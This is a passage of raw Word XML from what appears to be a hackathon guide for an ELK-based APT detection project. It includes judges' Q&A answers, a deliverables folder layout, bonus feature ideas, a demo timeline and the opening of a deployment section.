            <w:r w:rsidRPr="004536D2">
              <w:t xml:space="preserve">“We plan to add </w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Transformer-based </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>behavior</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>modeling</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004536D2">
              <w:t xml:space="preserve"> in the next phase — starting with ELK gave us a robust foundation for real-time data pipelines.”</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="24560A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36BBA" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>“How is this useful for NTRO?”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DE8BAE0" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t xml:space="preserve">“It’s a </w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>reusable detection framework</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:t xml:space="preserve"> that can be deployed in national SOCs for early APT warning, using open-source, cost-free infrastructure.”</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="432DF9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70206" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>“Can it scale?”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A755AED" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>“Yes. ELK is horizontally scalable. We can easily deploy multiple Logstash nodes or Elasticsearch clusters as traffic grows.”</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="55BC632C" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:pict w14:anchorId="1BCC6FEA">
          <v:rect id="_x0000_i1134" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3735818D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🗂️</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 8.6 — Final Deliverables Folder Structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB7CDA6" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t>ELK-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>APTGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18592177" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2"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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>logstash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6582A3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pipeline/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075167BB" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">│   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05-normalization.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59053378" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">│   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05-enrichment.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379467D3" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t>│   │   └── 05-output.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535FCC56" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t>│   └── config/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2EF269" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2"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rules/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D166097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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>detection_rules.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4E844E68" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t>│   └── mitre_mapping.csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C0C58C" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2"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docs/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32675690" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:lastRenderedPageBreak/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architecture.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4170AFD3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dashboard_screenshot.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B15FF81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alert_demo.mp4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F7C723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SIH_Presentation.pptx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9F6A4B" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t>│   └── system_maintenance.md</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BDC49E" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2"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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>beats_configs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762CC786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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>filebeat.yml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2EEF4FA0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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>winlogbeat.yml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2DCE6EFD" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">│   └── </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>suricata.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6384ACC9" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t>└── docker-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>compose.yml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="73E582CB" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:pict w14:anchorId="0CEE2067">
          <v:rect id="_x0000_i1135" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D7958A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🏆</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 8.7 — Bonus “Innovation” Add-Ons (for higher scores)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5790A945" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t>If time permits before the finale:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BAA99C" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">Add </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>threat-intel feed integration</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> (AlienVault OTX or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>AbuseIPDB</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> API).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B09B4F2" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">Add </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Telegram/Slack alerts</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> via webhook when rule triggers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6F5147" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">Add </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>auto-mitigation scripts</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> (e.g., block IP via firewall using API).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8DCE75" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">Add </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Transformer-based anomaly detection</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> (Step 7’s advanced retraining).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E364B26" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t>These will easily earn you innovation marks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EDD92E" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:pict w14:anchorId="265DD255">
          <v:rect id="_x0000_i1136" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B19486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✅</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 8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5444"/>
      </w:tblGrid>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="070257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BB836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51F6E029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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="0F5BC3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66F9B" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>SIH_Presentation.pptx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C248053" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>6–8 slide summary (problem → solution → demo → impact)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="0DB3CA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872D8" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>demo_video.mp4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="323A9D5D" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>30-sec recording of live detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="5D6913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C031E" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>dashboard.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="419071C3" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Dashboard screenshot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="054B49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AFC51" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>architecture.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="431E87C4" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>System architecture (generated earlier)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="5B6BE7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14174" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>judges_QA_sheet.md</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1218C5E0" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Prepared answers to common SIH questions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="55A9BED4" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:pict w14:anchorId="785AC238">
          <v:rect id="_x0000_i1137" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0AACCB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🎬</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Your Demo Sequence (5–7 min Script)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7093E985" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(0:00–0:45)</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> Intro + Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7572843B" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(0:45–2:00)</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> Architecture + Solution Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4547C172" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>(2:00–3:30)</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> Implementation (show stack)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD50F8C" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(3:30–5:00)</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> Live Demo (simulate APT → alert trigger)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C26598" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(5:00–6:00)</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> Dashboard + Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C05C3F" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(6:00–7:00)</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> Impact, Future Work, Q&amp;A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9FC989" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:pict w14:anchorId="4CD9D927">
          <v:rect id="_x0000_i1138" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73034EEE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🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Final Line for Judges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F7E936" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">“Our solution transforms traditional ELK into a </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>real-time, APT-aware detection engine</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:br/>
        <w:t>It not only visualizes attacks but also empowers security agencies to detect and respond before damage occurs — all built using open-source, scalable technologies.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5988CADA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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 9 — Deployment, Maintenance &amp; Continuous Threat Rule Updates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDAFBF0" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">This is the stage that comes </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>after your system is built and demo-ready</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t>, ensuring your ELK-based APT Detection system runs smoothly, scales well, and keeps evolving with new threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0011DC" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:pict w14:anchorId="30DFC074">
          <v:rect id="_x0000_i1139" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B9FF84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🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Goal of Step 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8C0F37" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">To make your project </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>production-ready</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> — meaning it can run continuously, handle real data, update rules, and stay secure even after SIH.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A30ADE3" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t>We’ll cover:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688BBB0C" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> Deployment (Local → Cloud)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5393B68A" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🔄</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> Continuous Threat Rule Updates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CEBDA6" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🧰</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> Maintenance &amp; Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4E6A42" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>📈</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> Scalability Enhancements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4F67D3" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
